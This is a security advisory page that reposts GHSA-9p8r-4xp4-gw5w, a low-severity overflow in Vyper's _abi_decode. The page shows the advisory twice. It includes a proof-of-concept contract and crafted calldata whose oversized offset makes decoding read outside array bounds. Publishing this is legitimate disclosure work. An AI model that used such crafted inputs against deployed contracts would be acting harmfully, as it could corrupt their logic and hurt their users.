Security
Headlines
HeadlinesLatestCVEs

Headline

GHSA-9p8r-4xp4-gw5w: Vyper's `_abi_decode` vulnerable to Memory Overflow

Summary

If an excessively large value is specified as the starting index for an array in _abi_decode, it can cause the read position to overflow. This results in the decoding of values outside the intended array bounds, potentially leading to bugs in contracts that use arrays within _abi_decode. The advisory has been assigned low severity, because it is only observable if there is a memory write between two invocations of abi_decode on the same input.

Proof of Concept

event Pwn:
    pass

@external
def f(x: Bytes[32 * 3]):
    a: Bytes[32] = b"foo"
    y: Bytes[32 * 3] = x

    decoded_y1: Bytes[32] = _abi_decode(y, Bytes[32])
    a = b"bar"
    decoded_y2: Bytes[32] = _abi_decode(y, Bytes[32])

    if decoded_y1 != decoded_y2:
        log Pwn()

Sending the following calldata results in Pwn being emitted.

0xd45754f8
0000000000000000000000000000000000000000000000000000000000000020
0000000000000000000000000000000000000000000000000000000000000060
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffa0
ghsa
Open in Source

Summary

If an excessively large value is specified as the starting index for an array in _abi_decode, it can cause the read position to overflow. This results in the decoding of values outside the intended array bounds, potentially leading to bugs in contracts that use arrays within _abi_decode. The advisory has been assigned low severity, because it is only observable if there is a memory write between two invocations of abi_decode on the same input.

Proof of Concept

event Pwn: pass

@external def f(x: Bytes[32 * 3]): a: Bytes[32] = b"foo" y: Bytes[32 * 3] = x

decoded\_y1: Bytes\[32\] \= \_abi\_decode(y, Bytes\[32\])
a \= b"bar"
decoded\_y2: Bytes\[32\] \= \_abi\_decode(y, Bytes\[32\])

if decoded\_y1 != decoded\_y2:
    log Pwn()

Sending the following calldata results in Pwn being emitted.

0xd45754f8
0000000000000000000000000000000000000000000000000000000000000020
0000000000000000000000000000000000000000000000000000000000000060
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffa0

References

  • GHSA-9p8r-4xp4-gw5w

ghsa: Latest News

GHSA-g5x8-v2ch-gj2g: Vaultwarden HTML injection vulnerability
ghsa